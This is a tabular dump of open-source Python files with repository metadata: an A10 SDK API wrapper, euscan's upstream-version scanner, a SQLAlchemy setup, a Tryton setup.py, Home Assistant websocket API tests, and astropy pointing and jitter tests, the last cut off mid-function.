| code (stringlengths 3-1.05M) | repo_name (stringlengths 5-104) | path (stringlengths 4-251) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 3-1.05M) |
|---|---|---|---|---|---|
from a10sdk.common.A10BaseClass import A10BaseClass
class AuthSamlIdp(A10BaseClass):
""" :param saml_idp_name: {"description": "Local IDP metadata name", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
SAML metadata of identity provider.
Class auth-saml-idp supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/delete/auth-saml-idp`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "auth-saml-idp"
self.a10_url="/axapi/v3/delete/auth-saml-idp"
self.DeviceProxy = ""
self.saml_idp_name = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| amwelch/a10sdk-python | a10sdk/core/delete/delete_auth_saml_idp.py | Python | apache-2.0 | 1,028 |
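The generated wrapper above just records its aXAPI URL and collects keyword arguments as attributes. A minimal, self-contained sketch of that pattern (a toy stand-in, not the real a10sdk API; `ToyAuthSamlIdp` and its fields are illustrative only):

```python
# Toy stand-in mirroring the attribute-collection pattern of the generated
# a10sdk classes; it is not the real SDK and performs no REST calls.
class ToyAuthSamlIdp:
    def __init__(self, **kwargs):
        self.b_key = "auth-saml-idp"
        self.a10_url = "/axapi/v3/delete/auth-saml-idp"
        self.saml_idp_name = ""
        # Any keyword argument becomes an attribute, exactly as in __init__ above.
        for key, value in kwargs.items():
            setattr(self, key, value)

idp = ToyAuthSamlIdp(saml_idp_name="corp-idp")
print(idp.a10_url, idp.saml_idp_name)  # /axapi/v3/delete/auth-saml-idp corp-idp
```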
# -*- coding: utf-8 -*-
# 15/6/10
# create by: snower
| snower/forsun | forsun/servers/__init__.py | Python | mit | 53 |
from urlparse import urljoin, urlparse
import urllib2
import re
import StringIO
import difflib
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
from bs4 import BeautifulSoup
import portage
from euscan import output, helpers, mangling, CONFIG, SCANDIR_BLACKLIST_URLS, \
BRUTEFORCE_BLACKLIST_PACKAGES, BRUTEFORCE_BLACKLIST_URLS
HANDLER_NAME = "generic"
CONFIDENCE = 45
PRIORITY = 0
BRUTEFORCE_HANDLER_NAME = "brute_force"
BRUTEFORCE_CONFIDENCE = 30
def confidence_score(found, original, minimum=CONFIDENCE):
found_p = urlparse(found)
original_p = urlparse(original)
# check if the base url is the same
if found_p.netloc != original_p.netloc:
return minimum
# check if the directory depth is the same
if len(found_p.path.split("/")) != len(original_p.path.split("/")):
return minimum
# strip numbers
found_path = re.sub(r"[\d+\.]?", "", found_p.path)
original_path = re.sub(r"[\d+\.]?", "", original_p.path)
# strip the first equal part of the path
i = 0
max_i = min(len(found_path), len(original_path))
while i < max_i and found_path[i] == original_path[i]:
i += 1
found_path = found_path[i:]
original_path = original_path[i:]
# calculate difference ratio
diff = difflib.SequenceMatcher(None, found_path, original_path).ratio()
return int(minimum + minimum * diff) # maximum score is minimum * 2
def scan_html(data, url, pattern):
soup = BeautifulSoup(data)
results = []
for link in soup.findAll('a'):
href = link.get("href")
if not href:
continue
if href.startswith(url):
href = href.replace(url, "", 1)
match = re.search(pattern, href, re.I)
if match:
results.append(
(".".join([x for x in match.groups() if x is not None]),
match.group(0))
)
return results
def scan_ftp(data, url, pattern):
buf = StringIO.StringIO(data)
results = []
for line in buf.readlines():
line = line.replace("\n", "").replace("\r", "")
match = re.search(pattern, line, re.I)
if match:
results.append(
(".".join([x for x in match.groups() if x is not None]),
match.group(0))
)
return results
def scan_directory_recursive(cp, ver, rev, url, steps, orig_url, options):
if not steps:
return []
url += steps[0][0]
pattern = steps[0][1]
steps = steps[1:]
output.einfo("Scanning: %s" % url)
try:
fp = helpers.urlopen(url)
except urllib2.URLError:
return []
except IOError:
return []
if not fp:
return []
data = fp.read()
results = []
if re.search("<\s*a\s+[^>]*href", data, re.I):
results.extend(scan_html(data, url, pattern))
elif url.startswith('ftp://'):
results.extend(scan_ftp(data, url, pattern))
versions = []
for up_pv, path in results:
pv = mangling.mangle_version(up_pv, options)
if helpers.version_filtered(cp, ver, pv):
continue
if not url.endswith("/"):
url = url + "/"
path = urljoin(url, path)
if not steps and path not in orig_url:
confidence = confidence_score(path, orig_url)
path = mangling.mangle_url(path, options)
versions.append((path, pv, HANDLER_NAME, confidence))
if steps:
ret = scan_directory_recursive(cp, ver, rev, path, steps, orig_url,
options)
versions.extend(ret)
return versions
def scan_url(pkg, url, options):
if CONFIG["scan-dir"]:
for bu in SCANDIR_BLACKLIST_URLS:
if re.match(bu, url):
output.einfo("%s is blacklisted by rule %s" % (url, bu))
return []
resolved_url = helpers.parse_mirror(url)
if not resolved_url:
return []
cp, ver, rev = portage.pkgsplit(pkg.cpv)
# 'Hack' for _beta/_rc versions where _ is used instead of -
if ver not in resolved_url:
newver = helpers.version_change_end_sep(ver)
if newver and newver in resolved_url:
output.einfo(
"Version: using %s instead of %s" % (newver, ver)
)
ver = newver
template = helpers.template_from_url(resolved_url, ver)
if '${' not in template:
output.einfo(
"Url doesn't seems to depend on version: %s not found in %s" %
(ver, resolved_url)
)
return []
else:
output.einfo("Scanning: %s" % template)
steps = helpers.generate_scan_paths(template)
ret = scan_directory_recursive(cp, ver, rev, "", steps, url, options)
if not ret:
ret = brute_force(pkg, url)
return ret
def brute_force(pkg, url):
if CONFIG["brute-force"] == 0:
return []
cp, ver, rev = portage.pkgsplit(pkg.cpv)
url = helpers.parse_mirror(url)
if not url:
return []
for bp in BRUTEFORCE_BLACKLIST_PACKAGES:
if re.match(bp, cp):
output.einfo("%s is blacklisted by rule %s" % (cp, bp))
return []
for bp in BRUTEFORCE_BLACKLIST_URLS:
if re.match(bp, url):
output.einfo("%s is blacklisted by rule %s" % (cp, bp))
return []
output.einfo("Generating version from " + ver)
components = helpers.split_version(ver)
versions = helpers.gen_versions(components, CONFIG["brute-force"])
# Remove unwanted versions
for v in versions[:]:  # iterate over a copy so that remove() below is safe
if helpers.vercmp(cp, ver, helpers.join_version(v)) >= 0:
versions.remove(v)
if not versions:
output.einfo("Can't generate new versions from " + ver)
return []
template = helpers.template_from_url(url, ver)
if '${PV}' not in template:
output.einfo(
"Url doesn't seems to depend on full version: %s not found in %s" %
(ver, url))
return []
else:
output.einfo("Brute forcing: %s" % template)
result = []
i = 0
done = []
while i < len(versions):
components = versions[i]
i += 1
if tuple(components) in done:
continue
done.append(tuple(components))
version = helpers.join_version(components)
if helpers.version_filtered(cp, ver, version):
continue
try_url = helpers.url_from_template(template, version)
infos = helpers.tryurl(try_url, template)
if not infos:
continue
confidence = confidence_score(try_url, url,
minimum=BRUTEFORCE_CONFIDENCE)
result.append([try_url, version, BRUTEFORCE_HANDLER_NAME, confidence])
if len(result) > CONFIG['brute-force-false-watermark']:
output.einfo(
"Broken server detected ! Skipping brute force."
)
return []
if CONFIG["brute-force-recursive"]:
for v in helpers.gen_versions(list(components),
CONFIG["brute-force"]):
if v not in versions and tuple(v) not in done:
versions.append(v)
if CONFIG["oneshot"]:
break
return result
def can_handle(pkg, url):
return True
| iksaif/euscan | pym/euscan/handlers/generic.py | Python | gpl-2.0 | 7,458 |
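`confidence_score` above compares the digit-stripped tails of two URL paths with difflib after requiring the same host and directory depth. A self-contained Python 3 sketch of the same idea (independent of the euscan helpers; the example URLs are made up):

```python
import difflib
import re
from urllib.parse import urlparse

def toy_confidence(found, original, minimum=45):
    """Score how closely a candidate URL resembles the original one."""
    f, o = urlparse(found), urlparse(original)
    if f.netloc != o.netloc:                      # must be the same host
        return minimum
    if len(f.path.split("/")) != len(o.path.split("/")):  # same directory depth
        return minimum
    # Strip digits and dots so only the "shape" of the path is compared.
    fp = re.sub(r"[\d.]", "", f.path)
    op = re.sub(r"[\d.]", "", o.path)
    # Drop the common prefix; only the differing tails influence the ratio.
    i = 0
    while i < len(fp) and i < len(op) and fp[i] == op[i]:
        i += 1
    ratio = difflib.SequenceMatcher(None, fp[i:], op[i:]).ratio()
    return int(minimum + minimum * ratio)         # ranges from minimum to 2 * minimum

print(toy_confidence("http://example.org/pkg/foo-1.3.tar.gz",
                     "http://example.org/pkg/foo-1.2.tar.gz"))  # -> 90
```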
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker,scoped_session
from settings import DB_DIR
Base = declarative_base()
engine = create_engine(DB_DIR, echo=True)
db = scoped_session(sessionmaker(bind=engine))
| Luffin/ThousandSunny | GoingMerry/database.py | Python | mit | 293 |
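For context, this is how such a module-level `scoped_session` is typically consumed; the `User` model and the in-memory SQLite URL below are illustrative stand-ins for whatever `DB_DIR` and models the ThousandSunny project actually defines (SQLAlchemy 1.x style, matching the imports above):

```python
from sqlalchemy import Column, Integer, String, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker

Base = declarative_base()

class User(Base):                        # illustrative model, not from the repo
    __tablename__ = "users"
    id = Column(Integer, primary_key=True)
    name = Column(String(64))

engine = create_engine("sqlite:///:memory:", echo=False)
Base.metadata.create_all(engine)         # create tables for all declarative models
db = scoped_session(sessionmaker(bind=engine))

db.add(User(name="nami"))
db.commit()
print(db.query(User).count())            # -> 1
db.remove()                              # release the thread-local session
```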
#!/usr/bin/env python
# This file is part company_logo module for Tryton.
# The COPYRIGHT file at the top level of this repository contains
# the full copyright notices and license terms.
from setuptools import setup
import re
import os
import io
try:
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
MODULE2PREFIX = {}
def read(fname):
return io.open(
os.path.join(os.path.dirname(__file__), fname),
'r', encoding='utf-8').read()
def get_require_version(name):
if minor_version % 2:
require = '%s >= %s.%s.dev0, < %s.%s'
else:
require = '%s >= %s.%s, < %s.%s'
require %= (name, major_version, minor_version,
major_version, minor_version + 1)
return require
config = ConfigParser()
config.readfp(open('tryton.cfg'))
info = dict(config.items('tryton'))
for key in ('depends', 'extras_depend', 'xml'):
if key in info:
info[key] = info[key].strip().splitlines()
version = info.get('version', '0.0.1')
major_version, minor_version, _ = version.split('.', 2)
major_version = int(major_version)
minor_version = int(minor_version)
name = 'trytonspain_company_logo'
download_url = 'https://bitbucket.org/trytonspain/trytond-company_logo'
requires = []
for dep in info.get('depends', []):
if not re.match(r'(ir|res)(\W|$)', dep):
prefix = MODULE2PREFIX.get(dep, 'trytond')
requires.append(get_require_version('%s_%s' % (prefix, dep)))
requires.append(get_require_version('trytond'))
tests_require = []
dependency_links = []
if minor_version % 2:
# Add development index for testing with proteus
dependency_links.append('https://trydevpi.tryton.org/')
setup(name=name,
version=version,
description='Tryton Company Logo Module',
long_description=read('README'),
author='TrytonSpain',
author_email='',
url='https://bitbucket.org/trytonspain/',
download_url=download_url,
keywords='',
package_dir={'trytond.modules.company_logo': '.'},
packages=[
'trytond.modules.company_logo',
'trytond.modules.company_logo.tests',
],
package_data={
'trytond.modules.company_logo': (info.get('xml', [])
+ ['tryton.cfg', 'view/*.xml', 'locale/*.po', '*.odt',
'icons/*.svg', 'tests/*.rst']),
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Plugins',
'Framework :: Tryton',
'Intended Audience :: Developers',
'Intended Audience :: Financial and Insurance Industry',
'Intended Audience :: Legal Industry',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Natural Language :: Bulgarian',
'Natural Language :: Catalan',
'Natural Language :: Czech',
'Natural Language :: Dutch',
'Natural Language :: English',
'Natural Language :: French',
'Natural Language :: German',
'Natural Language :: Hungarian',
'Natural Language :: Italian',
'Natural Language :: Portuguese (Brazilian)',
'Natural Language :: Russian',
'Natural Language :: Slovenian',
'Natural Language :: Spanish',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Office/Business',
],
license='GPL-3',
install_requires=requires,
dependency_links=dependency_links,
zip_safe=False,
entry_points="""
[trytond.modules]
company_logo = trytond.modules.company_logo
""",
test_suite='tests',
test_loader='trytond.test_loader:Loader',
tests_require=tests_require,
use_2to3=True,
)
| ferjavrec/company_logo | setup.py | Python | gpl-3.0 | 3,994 |
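The requirement strings built by `get_require_version` pin each module to the matching Tryton series, with `.dev0` lower bounds on odd (development) minor versions. A small standalone sketch of that logic with a made-up version number:

```python
def require_version(name, major, minor):
    # Odd minor versions are development series, so accept .dev0 pre-releases.
    if minor % 2:
        template = "%s >= %s.%s.dev0, < %s.%s"
    else:
        template = "%s >= %s.%s, < %s.%s"
    return template % (name, major, minor, major, minor + 1)

print(require_version("trytond", 5, 0))          # trytond >= 5.0, < 5.1
print(require_version("trytond_company", 5, 1))  # trytond_company >= 5.1.dev0, < 5.2
```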
"""Tests for WebSocket API commands."""
from async_timeout import timeout
from homeassistant.components.websocket_api import const
from homeassistant.components.websocket_api.auth import (
TYPE_AUTH,
TYPE_AUTH_OK,
TYPE_AUTH_REQUIRED,
)
from homeassistant.components.websocket_api.const import URL
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import async_get_integration
from homeassistant.setup import async_setup_component
from tests.common import async_mock_service
async def test_call_service(hass, websocket_client):
"""Test call service command."""
calls = []
@callback
def service_call(call):
calls.append(call)
hass.services.async_register("domain_test", "test_service", service_call)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert len(calls) == 1
call = calls[0]
assert call.domain == "domain_test"
assert call.service == "test_service"
assert call.data == {"hello": "world"}
async def test_call_service_not_found(hass, websocket_client):
"""Test call service command."""
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_NOT_FOUND
async def test_call_service_child_not_found(hass, websocket_client):
"""Test not reporting not found errors if it's not the called service."""
async def serv_handler(call):
await hass.services.async_call("non", "existing")
hass.services.async_register("domain_test", "test_service", serv_handler)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_HOME_ASSISTANT_ERROR
async def test_call_service_error(hass, websocket_client):
"""Test call service command with error."""
@callback
def ha_error_call(_):
raise HomeAssistantError("error_message")
hass.services.async_register("domain_test", "ha_error", ha_error_call)
async def unknown_error_call(_):
raise ValueError("value_error")
hass.services.async_register("domain_test", "unknown_error", unknown_error_call)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "ha_error",
}
)
msg = await websocket_client.receive_json()
print(msg)
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"] is False
assert msg["error"]["code"] == "home_assistant_error"
assert msg["error"]["message"] == "error_message"
await websocket_client.send_json(
{
"id": 6,
"type": "call_service",
"domain": "domain_test",
"service": "unknown_error",
}
)
msg = await websocket_client.receive_json()
print(msg)
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"] is False
assert msg["error"]["code"] == "unknown_error"
assert msg["error"]["message"] == "value_error"
async def test_subscribe_unsubscribe_events(hass, websocket_client):
"""Test subscribe/unsubscribe events command."""
init_count = sum(hass.bus.async_listeners().values())
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "test_event"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
# Verify we have a new listener
assert sum(hass.bus.async_listeners().values()) == init_count + 1
hass.bus.async_fire("ignore_event")
hass.bus.async_fire("test_event", {"hello": "world"})
hass.bus.async_fire("ignore_event")
with timeout(3):
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event["event_type"] == "test_event"
assert event["data"] == {"hello": "world"}
assert event["origin"] == "LOCAL"
await websocket_client.send_json(
{"id": 6, "type": "unsubscribe_events", "subscription": 5}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
# Check our listener got unsubscribed
assert sum(hass.bus.async_listeners().values()) == init_count
async def test_get_states(hass, websocket_client):
"""Test get_states command."""
hass.states.async_set("greeting.hello", "world")
hass.states.async_set("greeting.bye", "universe")
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
states = []
for state in hass.states.async_all():
state = state.as_dict()
state["last_changed"] = state["last_changed"].isoformat()
state["last_updated"] = state["last_updated"].isoformat()
states.append(state)
assert msg["result"] == states
async def test_get_services(hass, websocket_client):
"""Test get_services command."""
await websocket_client.send_json({"id": 5, "type": "get_services"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert msg["result"] == hass.services.async_services()
async def test_get_config(hass, websocket_client):
"""Test get_config command."""
await websocket_client.send_json({"id": 5, "type": "get_config"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
if "components" in msg["result"]:
msg["result"]["components"] = set(msg["result"]["components"])
if "whitelist_external_dirs" in msg["result"]:
msg["result"]["whitelist_external_dirs"] = set(
msg["result"]["whitelist_external_dirs"]
)
if "allowlist_external_dirs" in msg["result"]:
msg["result"]["allowlist_external_dirs"] = set(
msg["result"]["allowlist_external_dirs"]
)
if "allowlist_external_urls" in msg["result"]:
msg["result"]["allowlist_external_urls"] = set(
msg["result"]["allowlist_external_urls"]
)
assert msg["result"] == hass.config.as_dict()
async def test_ping(websocket_client):
"""Test get_panels command."""
await websocket_client.send_json({"id": 5, "type": "ping"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "pong"
async def test_call_service_context_with_user(hass, aiohttp_client, hass_access_token):
"""Test that the user is set in the service call context."""
assert await async_setup_component(hass, "websocket_api", {})
calls = async_mock_service(hass, "domain_test", "test_service")
client = await aiohttp_client(hass.http.app)
async with client.ws_connect(URL) as ws:
auth_msg = await ws.receive_json()
assert auth_msg["type"] == TYPE_AUTH_REQUIRED
await ws.send_json({"type": TYPE_AUTH, "access_token": hass_access_token})
auth_msg = await ws.receive_json()
assert auth_msg["type"] == TYPE_AUTH_OK
await ws.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await ws.receive_json()
assert msg["success"]
refresh_token = await hass.auth.async_validate_access_token(hass_access_token)
assert len(calls) == 1
call = calls[0]
assert call.domain == "domain_test"
assert call.service == "test_service"
assert call.data == {"hello": "world"}
assert call.context.user_id == refresh_token.user.id
async def test_subscribe_requires_admin(websocket_client, hass_admin_user):
"""Test subscribing events without being admin."""
hass_admin_user.groups = []
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "test_event"}
)
msg = await websocket_client.receive_json()
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_UNAUTHORIZED
async def test_states_filters_visible(hass, hass_admin_user, websocket_client):
"""Test we only get entities that we're allowed to see."""
hass_admin_user.mock_policy({"entities": {"entity_ids": {"test.entity": True}}})
hass.states.async_set("test.entity", "hello")
hass.states.async_set("test.not_visible_entity", "invisible")
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert len(msg["result"]) == 1
assert msg["result"][0]["entity_id"] == "test.entity"
async def test_get_states_not_allows_nan(hass, websocket_client):
"""Test get_states command not allows NaN floats."""
hass.states.async_set("greeting.hello", "world", {"hello": float("NaN")})
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_UNKNOWN_ERROR
async def test_subscribe_unsubscribe_events_whitelist(
hass, websocket_client, hass_admin_user
):
"""Test subscribe/unsubscribe events on whitelist."""
hass_admin_user.groups = []
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "not-in-whitelist"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "unauthorized"
await websocket_client.send_json(
{"id": 6, "type": "subscribe_events", "event_type": "themes_updated"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
hass.bus.async_fire("themes_updated")
with timeout(3):
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == "event"
event = msg["event"]
assert event["event_type"] == "themes_updated"
assert event["origin"] == "LOCAL"
async def test_subscribe_unsubscribe_events_state_changed(
hass, websocket_client, hass_admin_user
):
"""Test subscribe/unsubscribe state_changed events."""
hass_admin_user.groups = []
hass_admin_user.mock_policy({"entities": {"entity_ids": {"light.permitted": True}}})
await websocket_client.send_json(
{"id": 7, "type": "subscribe_events", "event_type": "state_changed"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
hass.states.async_set("light.not_permitted", "on")
hass.states.async_set("light.permitted", "on")
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == "event"
assert msg["event"]["event_type"] == "state_changed"
assert msg["event"]["data"]["entity_id"] == "light.permitted"
async def test_render_template_renders_template(
hass, websocket_client, hass_admin_user
):
"""Test simple template is rendered and updated."""
hass.states.async_set("light.test", "on")
await websocket_client.send_json(
{
"id": 5,
"type": "render_template",
"template": "State is: {{ states('light.test') }}",
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
hass.states.async_set("light.test", "off")
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: off"}
async def test_render_template_with_manual_entity_ids(
hass, websocket_client, hass_admin_user
):
"""Test that updates to specified entity ids cause a template rerender."""
hass.states.async_set("light.test", "on")
hass.states.async_set("light.test2", "on")
await websocket_client.send_json(
{
"id": 5,
"type": "render_template",
"template": "State is: {{ states('light.test') }}",
"entity_ids": ["light.test2"],
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
hass.states.async_set("light.test2", "off")
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
async def test_render_template_returns_with_match_all(
hass, websocket_client, hass_admin_user
):
"""Test that a template that would match with all entities still return success."""
await websocket_client.send_json(
{"id": 5, "type": "render_template", "template": "State is: {{ 42 }}"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
async def test_manifest_list(hass, websocket_client):
"""Test loading manifests."""
http = await async_get_integration(hass, "http")
websocket_api = await async_get_integration(hass, "websocket_api")
await websocket_client.send_json({"id": 5, "type": "manifest/list"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert sorted(msg["result"], key=lambda manifest: manifest["domain"]) == [
http.manifest,
websocket_api.manifest,
]
async def test_manifest_get(hass, websocket_client):
"""Test getting a manifest."""
hue = await async_get_integration(hass, "hue")
await websocket_client.send_json(
{"id": 6, "type": "manifest/get", "integration": "hue"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert msg["result"] == hue.manifest
# Non existing
await websocket_client.send_json(
{"id": 7, "type": "manifest/get", "integration": "non_existing"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "not_found"
| mKeRix/home-assistant | tests/components/websocket_api/test_commands.py | Python | mit | 16,345 |
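All of the tests above exercise the same framing: the client sends a JSON message with an increasing `id` and a `type`, and the server answers with a frame carrying the same `id`. A minimal dispatcher sketch of that convention, independent of Home Assistant's fixtures (the handler table is hypothetical):

```python
import json

# Hypothetical command handlers keyed by the message "type" field.
HANDLERS = {
    "ping": lambda msg: {"id": msg["id"], "type": "pong"},
    "get_states": lambda msg: {"id": msg["id"], "type": "result",
                               "success": True, "result": []},
}

def dispatch(raw):
    """Route one JSON frame to its handler, echoing the request id back."""
    msg = json.loads(raw)
    handler = HANDLERS.get(msg["type"])
    if handler is None:
        return {"id": msg["id"], "type": "result", "success": False,
                "error": {"code": "unknown_command"}}
    return handler(msg)

print(dispatch(json.dumps({"id": 5, "type": "ping"})))
print(dispatch(json.dumps({"id": 6, "type": "no_such_command"})))
```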
# Licensed under GPL version 3 - see LICENSE.rst
import numpy as np
from astropy.table import Table
from astropy.coordinates import SkyCoord
import astropy.units as u
from scipy.stats import pearsonr
import pytest
from ...source import FixedPointing, JitterPointing, PointSource
def test_reference_coordinate_system():
'''Usually, rays that are on-axis will come in along the x-axis.
Test a simulation with a different coordinate system.'''
s = PointSource(coords=SkyCoord(12., 34., unit='deg'))
photons = s.generate_photons(5)
point_x = FixedPointing(coords=SkyCoord(12., 34., unit='deg'))
p_x = point_x(photons.copy())
assert np.allclose(p_x['dir'].data[:, 0], -1.)
assert np.allclose(p_x['dir'].data[:, 1:], 0)
xyz2zxy = np.array([[0., 0, 1, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1]]).T
point_z = FixedPointing(coords=SkyCoord(12., 34., unit='deg'), reference_transform=xyz2zxy)
p_z = point_z(photons.copy())
assert np.allclose(p_z['dir'].data[:, 2], -1.)
assert np.allclose(p_z['dir'].data[:, :2], 0)
def test_polarization_direction():
'''Test that a FixedPointing correctly assigns linear polarization vectors.'''
s = PointSource(coords=SkyCoord(187.4, 0., unit='deg'))
photons = s.generate_photons(5)
photons['polangle'] = (np.array([0., 90., 180., 270., 45.])) * u.deg.to(photons['polangle'].unit)
point_x = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'))
p_x = point_x(photons.copy())
# For simple linear polarization, polangle 0 and 180 are equivalent and the
# direction does not matter. However, with a view to elliptical polarization
# in the future, we want to fix the absolute phase, too.
assert np.allclose(p_x['polarization'].data[0, :], [0, 0, 1, 0])
assert np.allclose(p_x['polarization'].data[1, :], [0, 1, 0, 0])
assert np.allclose(p_x['polarization'].data[2, :], [0, 0, -1, 0])
assert np.allclose(p_x['polarization'].data[3, :], [0, -1, 0, 0])
assert np.allclose(p_x['polarization'].data[4, :], [0, 1/np.sqrt(2), 1/np.sqrt(2), 0])
xyz2zxy = np.array([[0., 0, 1, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1]]).T
point_z = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'), reference_transform=xyz2zxy)
p_z = point_z(photons.copy())
assert np.allclose(p_z['polarization'].data[0, :], [0, 1, 0, 0])
assert np.allclose(p_z['polarization'].data[1, :], [1, 0, 0, 0])
assert np.allclose(p_z['polarization'].data[4, :], [1/np.sqrt(2), 1/np.sqrt(2), 0, 0])
# Photons pointing east with the same RA will have parallel polarization vectors
# This is true for all pointing directions.
s = PointSource(coords=SkyCoord(22.5, 0., unit='deg'))
photons = s.generate_photons(5)
photons['dec'] = [67., 23., 0., -45.454, -67.88]
photons['polangle'] = (90. * u.deg).to(photons['polangle'].unit)
point = FixedPointing(coords=SkyCoord(94.3, 23., unit='deg'))
p = point(photons.copy())
for i in range(1, len(p)):
assert np.isclose(np.dot(p['polarization'][0], p['polarization'][i]), 1)
def test_jitter():
'''test size and randomness of jitter'''
n = 100000
ra = np.random.rand(n) * 2 * np.pi
# Note that my rays are not evenly distributed on the sky.
# No need to be extra fancy here, it's probably even better for
# a test to have more scrutiny around the poles.
dec = (np.random.rand(n) * 2. - 1.) / 2. * np.pi
time = np.arange(n)
pol = np.ones_like(ra)
prob = np.ones_like(ra)
photons = Table([ra, dec, time, pol, prob],
names=['ra', 'dec', 'time', 'polangle', 'probability'])
fixed = FixedPointing(coords = SkyCoord(25., -10., unit='deg'))
jittered = JitterPointing(coords = SkyCoord(25., -10., unit='deg'),
jitter=1. * u.arcsec)
p_fixed = fixed(photons.copy())
p_jitter = jittered(photons)
assert np.allclose(np.linalg.norm(p_fixed['dir'], axis=1), 1.)
assert np.allclose(np.linalg.norm(p_jitter['dir'], axis=1), 1.)
prod = np.sum(p_fixed['dir'] * p_jitter['dir'], axis=1)
# sum can give values > 1 due to rounding errors
# That would make arccos fail, so catch those here
ind = prod > 1.
if ind.sum() > 0:
prod[ind] = 1.
alpha = np.arccos(prod)
# in this formula alpha will always be the abs(angle).
# Flip some signs to recover the input normal distribution.
alpha *= np.sign(np.random.rand(n)-0.5)
